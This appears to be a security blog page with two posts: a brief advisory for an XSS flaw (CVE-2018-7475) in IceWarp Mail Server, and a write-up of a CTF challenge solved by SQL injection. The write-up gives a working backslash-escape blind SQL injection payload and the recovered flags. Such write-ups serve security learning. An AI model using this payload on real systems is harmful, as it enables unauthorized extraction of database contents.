CVE 2018-7475

Posted on February 25, 2018
============================================
CVE: CVE-2018-7475
============================================
Credit: 0xd0ff9
============================================
Dates: February 25, 2018
============================================
Vendor: https://www.icewarp.com/
============================================
Product: Ice Warp Mail Server
============================================
Versions Affected: 12.0.3
============================================
Risk / Severity Rating: Low
============================================
Vulnerability Description and Impact:
Description: Cross-site scripting (XSS) vulnerability for webdav/ticket/ URIs in IceWarp Mail.
Impact: context-dependent, such like force victim to change properties or make a open redirect to some malicious site.
For more information: https://www.youtube.com/watch?v=8_3Q80JrMm4&feature=youtu.be
============================================
Solution: Don’t output what user input, or sanitize it first.
============================================

Viettel matesctf round 5 (CoinMining)

When I start with this challenge, firstly I guess SSRF, exploit bot, javascript, exploit something with Cryptocurrency, bla bla…
But solution is SQL Injection.
Firstly, Guessing how it work, I guessed it use action to call function. In the javascript file, i find getDomain() function

Secondly, Guessing the arguments, I guessed this function “getDomain” have one argument and it is coin.

I think I guess very well.
After that, I guessed the query like:

select * from [table_name] where domainName="$_POST['domainName']" and coin="$_POST['coin']"

I guessed the character ‘,” is filtered or replaced, and I guessed the character \ didn’t replace or filter.
so I guessed my solution can be used character [\] to make [‘] be [\’] and escape query.

I used my payload to exploit:

action=doCheck&domainName=smallbox.ir\&coin=or if(substr((select anything from tablewhatyouwant limit 1),§1§,1)=0x§4c§,1,0)-- -
 

and got the flag in the table flag: matesctf: matesctf: fl4g_NT_h3r3_
but I guessed it is not the truly flag.

The real flag is in bingo table: matesctf{sql_f!l73r_i$_n0&_s@’f’_’3’n0ugh!}